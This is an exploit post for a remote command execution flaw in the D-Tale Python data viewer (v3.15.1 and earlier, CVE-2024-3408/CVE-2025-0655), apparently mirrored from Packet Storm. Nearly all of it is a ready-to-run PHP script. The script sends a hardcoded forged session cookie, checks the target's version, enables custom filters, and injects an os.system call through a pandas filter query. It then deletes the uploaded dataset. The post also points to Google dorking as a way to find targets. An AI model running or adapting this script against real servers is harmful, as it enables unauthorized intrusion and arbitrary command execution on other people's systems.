Share
## https://sploitus.com/exploit?id=PACKETSTORM:189774
=============================================================================================================================================
| # Title : D Tale v3.15.1 PHP code execution vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://pypi.org/project/dtale/ |
=============================================================================================================================================
POC :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] Code Description: Exploiting D-Tale Remote Command Execution Vulnerability Using PHP
(Related : https://packetstorm.news/files/id/189509/ Linked CVE numbers: CVE-2024-3408, CVE-2025-0655 ) .
[+] save code as poc.php.
[+] Set Target = line 102
[+] Usage = php poc.php
[+] PayLoad :
<?php
class D_Tale_RCE_Exploit {
private $session = 'eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoid2hhdGV2ZXIifQ.Z8Jdmw.zUb6b2uEm9ZDKWIOsw2A1xLIuLc';
private $target_url;
private $data_id;
private $payload;
public function __construct($target_url, $payload) {
$this->target_url = $target_url;
$this->payload = $payload;
}
// Function to send GET requests
private function send_get_request($uri, $headers = []) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $this->target_url . $uri);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
// Function to send POST requests
private function send_post_request($uri, $data, $headers = []) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $this->target_url . $uri);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
// Check for vulnerable version
public function check_vulnerability() {
$headers = ['Cookie: session=' . $this->session];
$response = $this->send_get_request('/dtale/popup/upload', $headers);
if (strpos($response, 'version') !== false) {
preg_match('/<input type="hidden" id="version" value="(.*?)">/', $response, $matches);
if (isset($matches[1]) && version_compare($matches[1], '3.15.1', '<=')) {
return true;
}
}
return false;
}
// Exploit the vulnerability
public function exploit() {
// Step 1: Upload a CSV file to trigger the exploit
$mime_boundary = "---------------------------" . rand();
$data = "--$mime_boundary\r\n";
$data .= "Content-Disposition: form-data; name=\"file\"; filename=\"payload.csv\"\r\n";
$data .= "Content-Type: text/csv\r\n\r\n";
$data .= "payload_data\r\n";
$data .= "--$mime_boundary--\r\n";
$headers = [
'Content-Type: multipart/form-data; boundary=' . $mime_boundary,
'Cookie: session=' . $this->session
];
$response = $this->send_post_request('/dtale/upload', $data, $headers);
preg_match('/"data_id":"(.*?)"/', $response, $matches);
if (isset($matches[1])) {
$this->data_id = $matches[1];
echo "Data ID: " . $this->data_id . "\n";
} else {
echo "Failed to get data ID.\n";
return;
}
// Step 2: Enable custom filters
$settings = json_encode(['enable_custom_filters' => true]);
$this->send_get_request("/dtale/update-settings/{$this->data_id}?settings=" . urlencode($settings), $headers);
// Step 3: Execute the payload via custom filter
$query = "@pd.core.frame.com.builtins.__import__('os').system('" . $this->payload . "')";
$this->send_get_request("/dtale/test-filter/{$this->data_id}?query=" . urlencode($query) . "&save=true", $headers);
echo "Payload executed successfully.\n";
}
// Cleanup after exploit
public function cleanup() {
if ($this->data_id) {
$headers = ['Cookie: session=' . $this->session];
$this->send_get_request("/dtale/cleanup-datasets?dataIds={$this->data_id}", $headers);
echo "Cleaned up the dataset.\n";
}
}
}
// Usage
$target_url = 'http://target.site.com';
$payload = 'id'; // Example payload
$exploit = new D_Tale_RCE_Exploit($target_url, $payload);
if ($exploit->check_vulnerability()) {
echo "Vulnerable version detected. Exploiting...\n";
$exploit->exploit();
$exploit->cleanup();
} else {
echo "Target is not vulnerable.\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================